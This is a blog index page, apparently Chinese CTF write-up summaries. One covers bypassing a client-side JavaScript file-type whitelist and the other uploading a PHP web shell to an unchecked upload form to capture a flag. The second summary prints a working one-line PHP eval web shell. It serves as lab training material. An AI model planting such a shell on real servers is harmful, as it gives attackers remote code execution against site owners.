摘要:
根据题目提示去查看源代码中的js脚本 在函数checkfilesuffix()中定义了一个白名单whitelist,通过变量file_suffix可以看出该网站需要验证的是上传文件的后缀, indexOf()返回-1时说明未查找到字符串,综上可得出上传的文件只能是以.jpg、.png、.gif为后缀 阅读全文
posted @ 2021-08-26 15:24
r1kka
阅读(205)
评论(0)
推荐(0)
摘要:
由题目可以知道,网站对于我们上传的任何文件都不做验证 可以确定思路:上传木马->获取靶机shell->在网站中寻找flag 我们先构造一个一句话木马:<?php @eval($_POST["pass"]);?> 保存为test.php上传至网站中 可以得到上传文件的相对路径:upload/test. 阅读全文
posted @ 2021-08-26 14:54
r1kka
阅读(189)
评论(0)
推荐(0)
浙公网安备 33010602011771号